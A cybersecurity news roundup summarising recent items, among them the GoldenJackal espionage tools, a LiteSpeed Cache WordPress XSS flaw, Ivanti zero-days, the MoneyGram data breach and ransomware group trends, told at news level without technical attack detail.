In today’s cybersecurity news…
GoldenJackal uses new tools against governments
Security researchers at ESET published details on a cyberespionage group dubbed GoldenJackal, which has been active since at least 2019. The group uses previously unknown tools to attack air-gapped systems, targeting government entities across Europe, the Middle East, and South Asia. Researchers noted that GoldenJackal uses a highly modular approach to attack systems, using several tools across its attack chain. GoldenUSBCopy monitors for new USB drives and copies content to disk, GoldenBlacklist downloads email messages from local servers, and GoldenMailer exfiltrates files through email to attacker-controlled accounts. It’s unclear how GoldenJackal gains initial access. ESET didn’t attribute the group to any specific country other than saying its members likely speak Russian.
Cross-site scripting flaw found in major WordPress plugin
The LiteSpeed Cache plugin is installed on over 6 million WordPress sites. However, security researcher TaiYou discovered three flaws in it, including an unauthenticated stored cross-site scripting flaw that allows for privilege escalation and code injection into the site with a single HTTP request. TaiYou also found that the plugin doesn’t implement input sanitization and output escaping when serving a web page. The researcher reported the flaw to its developer, Patchstack, which released a patch within 24 hours. Patchstack recommends updating to its latest version immediately.
Ukraine’s defense ministry launched military CERT
Since Russia invaded Ukraine, the conflict has had a persistent and evolving cyber element. Until now, Ukraine’s Ministry of Defense used a dedicated team of cybersecurity professionals to protect its systems. But this week, the ministry announced it had created a separate structural unit that would “expand its responsibilities in the field of cyber defense.” This unit will operate as a military computer emergency response team under the Ministry of Defense, which will support it with funding and legislative support. This team will also now coordinate with NATO on future initiatives.
Salt Typhoon and the dangers of backdoors
Yesterday, we covered the compromise of wiretap systems across several US telcos by the China-linked threat actors Salt Typhoon. TechCrunch’s Zack Whittaker published a piece illustrating this as the consequence of including legally required backdoors in communication channels. The 1994 Communications Assistance for Law Enforcement Act, or CALEA requires “communications providers” to provide all necessary assistance to lawful government requests for customer information. In the piece, Georgetown Law professor Matt Blaze described this kind of attack as “inevitable” and said “CALEA should be regarded as a cautionary tale, not a success story, for backdoors.”
Thanks to today’s episode sponsor, Vanta
Ivanti warns about more zero-days
Yesterday, Ivanti released updates to resolve three zero-days impacting their Cloud Services Appliances, or CSAs, under active exploitation. These vulnerabilities open the door to SQL injections, executing arbitrary code, and using path traversal weaknesses on CSA gateways to bypass security restrictions. These flaws impact CSA 5.0.1 and earlier, although Ivanti said it saw exploitation with customers running CAS 4.6, which just went end-of-life in September. Over the past several months, we’ve seen several Ivanti zero-days across various products. As a result, the company said it is “making a large investment in Secure by Design across our organization and signed the CISA Secure by Design pledge in May.”
MoneyGram confirms data loss in cyberattack
The money transfer company experienced a cyberattack on September 20th that caused a week-long outage of its primary app and website. MoneyGram has confirmed that the attacks stole customer data, including names, phone numbers, addresses, some Social Security numbers, government identification documents, and transaction data. There is no word on how many customers the breach impacted. In other filings, the company serves over 50 million people across 200 countries and territories annually.
Europol hackathon looks to combat human trafficking
Europol recently held its EMPACT hackathon, bringing together 76 experts from 27 countries over four days, focusing on finding identity indicators for internet-enabled trafficking and other illegal online activity. Throughout EMPACT, law enforcement identified 16 suspected human traffickers and 60 potential victims. It investigated several platforms, including ones that offer training courses for being “OnlyFans managers,” but in reality, effectively taught users how to become digital pimps. Researchers also discovered a dark website used by hundreds of traffickers to sell or hire victims.
Active ransomware groups on the rise
2024 saw several high-profile ransomware group takedowns, with more coordinated law enforcement efforts than ever. However, according to Secureworks State of the Threat Report, the number of observed active ransomware groups rose 30% on the year, with 31 new groups identified. The report shows a more fragmented ransomware landscape due to increased enforcement, with the ALPHV group no longer the top 3 groups by number of victims. LockBit accounted for 17% of all known victims, but that share is down 8% on the year. The PLAY group and RansomHub rounded out the top three. The increase in active groups did not see a similar rise in the number of victims in the year.